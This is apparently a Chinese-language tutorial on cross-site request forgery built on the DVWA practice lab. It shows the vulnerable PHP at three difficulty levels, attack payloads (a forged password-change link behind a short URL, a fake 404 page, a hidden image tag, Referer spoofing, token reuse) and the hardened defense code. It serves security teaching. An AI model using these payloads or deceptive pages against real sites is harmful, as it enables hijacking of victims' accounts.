CSRF introduce and usage

漏洞介绍

• 跨站请求伪造，也被称为one-click attack或者session riding,通常缩写为 CSRF 或者 XSRF。
• 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。
• 跟跨网站脚本相比，XSS 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户网页浏览器的信任。
• 通俗的可以理解为：攻击者盗用你的身份，利用网站对你的信任发起恶意请求。

漏洞原理

• 登录访问受信网站后，网站会发送Cookie到客户端，以确认用户的身份。
• 如果用户还未登出受信网站，同时访问了攻击者植入的危险网站，危险网站则可利用客户身份触发恶意请求。
• 客户端此时携带受信网站给出的Cookie，向受信网站发出危险网站的恶意请求。
• 受信网站通过Cookie判断客户端请求的来源，由于已经确认身份，受信网站会响应请求，攻击者目的达到。

• 

漏洞复现

• 这里使用DVWA靶场作为受信网站，构造危险链接模拟CSRF过程。

Low

代码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

审计

• 通过 GET 请求上传需要修改的密码，只对确认密码是否与新密码相同进行判断。
• 对密码进行转义字符过滤，未对 CSRF 做任何防御。

攻击

• 由于链接名太过暴露，很容易被识别出来，于是使用短链接(短网址入口)将链接压缩。

#原链接
http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#

#短链接
http://dwz-5.cn/1CpK

• 访问短链接，即可完成密码修改(改成12345)。

• 然而暴露的链接仍然不易被点击，于是第二种方法制造攻击页面，将链接伪造成一个404的页面，让客户端误以为网页出了问题。

<html>

<h1>404<h1>

<h2>File not found.<h2>

<a href="http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#">Return</a>

</html>

• 页面效果
• 
• 点击Return按钮即可跳转到攻击页面。

注：此处本来使用 隐藏图片 形式，通过页面加载图片的形式访问攻击页面(代码如下)，但刷新页面之后密码并未改变。

使用抓包工具测试，发现页面仍会请求链接。分析报文得知，点击式链接会自带Cookies，而隐藏图片访问时不会自动发送。

<img src="http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#" border="0" style="display:none;"/>

Medium

代码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Same as Low
        ...
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }
	...
}

审计

• 在Low的基础上增加了stripos函数，匹配HTTP报文中的REFERER参数($_SERVER[ 'HTTP_REFERER' ])是否包含HOST参数($_SERVER[ 'SERVER_NAME' ])。

HTTP_REFERER表示发送请求的来源；

SERVER_NAME表示配置默认的二级域名，不会是当前的域名；

HTTP_HOST才是当前的url头部；

HTTP_HOST = SERVER_NAME : SERVER_PORT

攻击

• 同样使用GET请求的方法，不过在Low的基础上使用抓包工具修改报文。
• HOST字段直接复制到REFERER，即可绕过匹配。
• 

High

代码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
	
    // Same as Medium
    ...
}
...
// Generate Anti-CSRF token
generateSessionToken();

?>

审计

• 在Low基础上加入了Anti-CSRF token来进行身份验证。

token是服务端随机生成的一串字符串，作为客户端进行请求的一个标识。

服务器生成一个token并将此token返回给客户端，以后客户端只需带上这个token前来请求数据即可，无需再次带上用户名和密码。

攻击

• 在页面隐藏元素中可以找到user_token。
• 
• 利用该token，将其加入链接变量中，即可通过token验证。
• 

漏洞防御

• 使用DVWA靶场的Impossible级别作为防御模板。

代码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

审计

• 在High的基础上加入了现密码的匹配，导致攻击者无法伪造危险链接，从源头上杜绝了CSRF的发生。